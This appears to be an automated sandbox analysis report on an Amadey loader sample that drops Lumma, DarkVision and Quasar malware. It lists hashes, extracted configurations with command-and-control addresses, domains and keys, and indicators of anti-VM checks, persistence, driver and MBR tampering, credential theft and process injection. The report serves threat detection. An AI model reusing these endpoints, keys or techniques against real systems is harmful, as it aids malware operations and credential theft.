amadey | d26022e6a7e6e4fc7daba48705a49845fe73acd2630d577937cde2c9948b4614

Analysis

max time kernel
90s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2025, 08:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

1.8MB
MD5

0d397828202c894e2ef844b26e254853
SHA1

643c9fa847acfab19a151de57596d88be6d5fd11
SHA256

d26022e6a7e6e4fc7daba48705a49845fe73acd2630d577937cde2c9948b4614
SHA512

5bd441e7357ff7ef1367e5257bc569ec43f365cd80e95629138644e593d93b458f76aa7339468e2e175362b0f6013e12f71906218ebf532aeaf09347f1ec6661
SSDEEP

24576:ZP/qjRC55a3RpBf0LNafQTUGhQTSg5723OiTkvMX0NwBmsREOrYAirzWn3vBZ3:lqekR0L3waQu823OiwfNLTXoBZ

Score

10^/10

amadey darkvision lumma quasar 092155 office04 bootkit defense_evasion discovery execution exploit persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://.ywmedici.top/noagis

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://gquavabvc.top/iuzhd

https://ywmedici.top/noagis

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/13088-27777-0x000000000C280000-0x000000000C3D4000-memory.dmp	family_quasar
behavioral1/memory/13088-27778-0x000000000C400000-0x000000000C41A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 7844 created 3116	7844	MSBuild.exe	51

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7195620bae.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8358f51d9a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d00a5fce0a.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
105	13088	powershell.exe
199	13088	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
13088	powershell.exe
6340	powershell.exe
13288	powershell.exe
10900	powershell.exe
6432	powershell.exe
8324	powershell.exe
9412	powershell.exe
12552	powershell.exe
2940	powershell.exe
5316	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 17 IoCs

flow	pid	Process
43	3748	rapes.exe
46	3180	futors.exe
54	3180	futors.exe
45	3560	svchost.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
84	3748	rapes.exe
201	4140	svchost015.exe
37	3748	rapes.exe
69	3748	rapes.exe
27	3748	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\750fb06b.sys	a61daa52.exe
File created	C:\Windows\System32\Drivers\klupd_750fb06ba_arkmon.sys	a61daa52.exe
File created	C:\Windows\System32\Drivers\klupd_750fb06ba_klbg.sys	a61daa52.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2240	takeown.exe
7172	icacls.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\750fb06b\ImagePath = "System32\\Drivers\\750fb06b.sys"	a61daa52.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_arkmon\ImagePath = "System32\\Drivers\\klupd_750fb06ba_arkmon.sys"	a61daa52.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_klbg\ImagePath = "System32\\Drivers\\klupd_750fb06ba_klbg.sys"	a61daa52.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_klark\ImagePath = "System32\\Drivers\\klupd_750fb06ba_klark.sys"	a61daa52.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_mark\ImagePath = "System32\\Drivers\\klupd_750fb06ba_mark.sys"	a61daa52.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_750fb06ba_arkmon.sys"	a61daa52.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7195620bae.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d00a5fce0a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7195620bae.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8358f51d9a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8358f51d9a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d00a5fce0a.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	larBxd7.exe

Deletes itself 1 IoCs

pid	Process
4684	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c7ee42db.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c7ee42db.cmd	powershell.exe

Executes dropped EXE 25 IoCs

pid	Process
3748	rapes.exe
960	VrQSuEQ.exe
5036	amnew.exe
3180	futors.exe
2696	UZPt0hR.exe
992	7195620bae.exe
2256	tzutil.exe
4684	w32tm.exe
4788	8358f51d9a.exe
4140	svchost015.exe
6220	RYZusWg.exe
6764	rapes.exe
6032	futors.exe
11796	n0hEgR9.exe
5440	Rm3cVPI.exe
6056	2ca55af8.exe
12800	a61daa52.exe
7784	mTk60rz.exe
9896	ZSoeRVBe.exe
9748	d00a5fce0a.exe
6032	IsValueCreated.exe
2584	LJl8AAr.exe
9916	TbV75ZR.exe
11576	larBxd7.exe
12520	9sWdA2p.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	7195620bae.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	8358f51d9a.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	d00a5fce0a.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\750fb06b.sys	a61daa52.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\750fb06b.sys\ = "Driver"	a61daa52.exe

Loads dropped DLL 64 IoCs

pid	Process
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe
9896	ZSoeRVBe.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2240	takeown.exe
7172	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7195620bae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10053080101\\7195620bae.exe"	futors.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\57ca6c8a-5811-4179-92e8-6c241018de9e = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{9e194119-9550-4fff-90bb-3aae40e28fb8}\\57ca6c8a-5811-4179-92e8-6c241018de9e.cmd\""	a61daa52.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	a61daa52.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
230	ip-api.com
234	ipinfo.io
235	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	8358f51d9a.exe
File opened for modification	\??\PhysicalDrive0	a61daa52.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000a00000002417f-33581.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
6544	tasklist.exe
10320	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
3680	random.exe
3748	rapes.exe
992	7195620bae.exe
4788	8358f51d9a.exe
6764	rapes.exe
9748	d00a5fce0a.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 960 set thread context of 3240	960	VrQSuEQ.exe	99
PID 992 set thread context of 4140	992	7195620bae.exe	118
PID 11796 set thread context of 6404	11796	n0hEgR9.exe	133
PID 2584 set thread context of 6724	2584	LJl8AAr.exe	153
PID 9916 set thread context of 7844	9916	TbV75ZR.exe	156
PID 6032 set thread context of 12932	6032	IsValueCreated.exe	166

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	a61daa52.exe
File opened (read-only)	\??\VBoxMiniRdrDN	2ca55af8.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe
File created	C:\Windows\Tasks\rapes.job	random.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
12172	sc.exe
11864	sc.exe
5888	sc.exe
4464	sc.exe
10460	sc.exe
6936	sc.exe
11632	sc.exe
7256	sc.exe
3332	sc.exe
12372	sc.exe
10216	sc.exe
9852	sc.exe
7824	sc.exe
10536	sc.exe
5380	sc.exe
12204	sc.exe
2872	sc.exe
7732	sc.exe
6512	sc.exe
8728	sc.exe
10692	sc.exe
6456	sc.exe
9516	sc.exe
6840	sc.exe
11096	sc.exe
10256	sc.exe
10428	sc.exe
10776	sc.exe
11724	sc.exe
1720	sc.exe
5144	sc.exe
5664	sc.exe
9776	sc.exe
11984	sc.exe
10892	sc.exe
11692	sc.exe
1584	sc.exe
10712	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	a61daa52.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	a61daa52.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2748	7844	WerFault.exe	156

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8358f51d9a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a61daa52.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d00a5fce0a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2ca55af8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7195620bae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
12476	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	231	Go-http-client/1.1

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
11504	taskkill.exe
5316	taskkill.exe
6896	taskkill.exe
7024	taskkill.exe
5656	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
8984	reg.exe
12384	reg.exe
13232	reg.exe
11640	reg.exe
8644	reg.exe
9392	reg.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
13088	powershell.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
3680	random.exe
3680	random.exe
3748	rapes.exe
3748	rapes.exe
3240	MSBuild.exe
3240	MSBuild.exe
3240	MSBuild.exe
3240	MSBuild.exe
2940	powershell.exe
2940	powershell.exe
2940	powershell.exe
992	7195620bae.exe
992	7195620bae.exe
4788	8358f51d9a.exe
4788	8358f51d9a.exe
6764	rapes.exe
6764	rapes.exe
13088	powershell.exe
13088	powershell.exe
13088	powershell.exe
6404	MSBuild.exe
6404	MSBuild.exe
6404	MSBuild.exe
6404	MSBuild.exe
6340	powershell.exe
6340	powershell.exe
5316	powershell.exe
5316	powershell.exe
5316	powershell.exe
6340	powershell.exe
5440	Rm3cVPI.exe
5440	Rm3cVPI.exe
5440	Rm3cVPI.exe
5440	Rm3cVPI.exe
9748	d00a5fce0a.exe
9748	d00a5fce0a.exe
9748	d00a5fce0a.exe
9748	d00a5fce0a.exe
9748	d00a5fce0a.exe
9748	d00a5fce0a.exe
6724	MSBuild.exe
6724	MSBuild.exe
6724	MSBuild.exe
6724	MSBuild.exe
7844	MSBuild.exe
7844	MSBuild.exe
7844	MSBuild.exe
7844	MSBuild.exe
4856	svchost.exe
4856	svchost.exe
4856	svchost.exe
4856	svchost.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12520	9sWdA2p.exe
12520	9sWdA2p.exe
12520	9sWdA2p.exe
12520	9sWdA2p.exe
12520	9sWdA2p.exe
12520	9sWdA2p.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe
12800	a61daa52.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2696	UZPt0hR.exe
2696	UZPt0hR.exe
2696	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	13088	powershell.exe
Token: SeDebugPrivilege	6220	RYZusWg.exe
Token: SeDebugPrivilege	6340	powershell.exe
Token: SeDebugPrivilege	5316	powershell.exe
Token: SeDebugPrivilege	12800	a61daa52.exe
Token: SeBackupPrivilege	12800	a61daa52.exe
Token: SeRestorePrivilege	12800	a61daa52.exe
Token: SeLoadDriverPrivilege	12800	a61daa52.exe
Token: SeShutdownPrivilege	12800	a61daa52.exe
Token: SeSystemEnvironmentPrivilege	12800	a61daa52.exe
Token: SeSecurityPrivilege	12800	a61daa52.exe
Token: SeDebugPrivilege	9896	ZSoeRVBe.exe
Token: SeBackupPrivilege	12800	a61daa52.exe
Token: SeRestorePrivilege	12800	a61daa52.exe
Token: SeDebugPrivilege	12800	a61daa52.exe
Token: SeSystemEnvironmentPrivilege	12800	a61daa52.exe
Token: SeSecurityPrivilege	12800	a61daa52.exe
Token: SeCreatePermanentPrivilege	12800	a61daa52.exe
Token: SeShutdownPrivilege	12800	a61daa52.exe
Token: SeLoadDriverPrivilege	12800	a61daa52.exe
Token: SeIncreaseQuotaPrivilege	12800	a61daa52.exe
Token: SeSecurityPrivilege	12800	a61daa52.exe
Token: SeSystemProfilePrivilege	12800	a61daa52.exe
Token: SeDebugPrivilege	12800	a61daa52.exe
Token: SeMachineAccountPrivilege	12800	a61daa52.exe
Token: SeCreateTokenPrivilege	12800	a61daa52.exe
Token: SeAssignPrimaryTokenPrivilege	12800	a61daa52.exe
Token: SeTcbPrivilege	12800	a61daa52.exe
Token: SeAuditPrivilege	12800	a61daa52.exe
Token: SeSystemEnvironmentPrivilege	12800	a61daa52.exe
Token: SeLoadDriverPrivilege	12800	a61daa52.exe
Token: SeLoadDriverPrivilege	12800	a61daa52.exe
Token: SeIncreaseQuotaPrivilege	12800	a61daa52.exe
Token: SeSecurityPrivilege	12800	a61daa52.exe
Token: SeSystemProfilePrivilege	12800	a61daa52.exe
Token: SeDebugPrivilege	12800	a61daa52.exe
Token: SeMachineAccountPrivilege	12800	a61daa52.exe
Token: SeCreateTokenPrivilege	12800	a61daa52.exe
Token: SeAssignPrimaryTokenPrivilege	12800	a61daa52.exe
Token: SeTcbPrivilege	12800	a61daa52.exe
Token: SeAuditPrivilege	12800	a61daa52.exe
Token: SeSystemEnvironmentPrivilege	12800	a61daa52.exe
Token: SeDebugPrivilege	6032	IsValueCreated.exe
Token: SeDebugPrivilege	6544	tasklist.exe
Token: SeDebugPrivilege	10320	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3680 wrote to memory of 3748	3680	random.exe	92
PID 3680 wrote to memory of 3748	3680	random.exe	92
PID 3680 wrote to memory of 3748	3680	random.exe	92
PID 3748 wrote to memory of 960	3748	rapes.exe	98
PID 3748 wrote to memory of 960	3748	rapes.exe	98
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 960 wrote to memory of 3240	960	VrQSuEQ.exe	99
PID 3748 wrote to memory of 5036	3748	rapes.exe	102
PID 3748 wrote to memory of 5036	3748	rapes.exe	102
PID 3748 wrote to memory of 5036	3748	rapes.exe	102
PID 5036 wrote to memory of 3180	5036	amnew.exe	103
PID 5036 wrote to memory of 3180	5036	amnew.exe	103
PID 5036 wrote to memory of 3180	5036	amnew.exe	103
PID 3748 wrote to memory of 2696	3748	rapes.exe	104
PID 3748 wrote to memory of 2696	3748	rapes.exe	104
PID 3748 wrote to memory of 2696	3748	rapes.exe	104
PID 2696 wrote to memory of 2248	2696	UZPt0hR.exe	105
PID 2696 wrote to memory of 2248	2696	UZPt0hR.exe	105
PID 2696 wrote to memory of 3560	2696	UZPt0hR.exe	107
PID 2696 wrote to memory of 3560	2696	UZPt0hR.exe	107
PID 2248 wrote to memory of 2940	2248	cmd.exe	108
PID 2248 wrote to memory of 2940	2248	cmd.exe	108
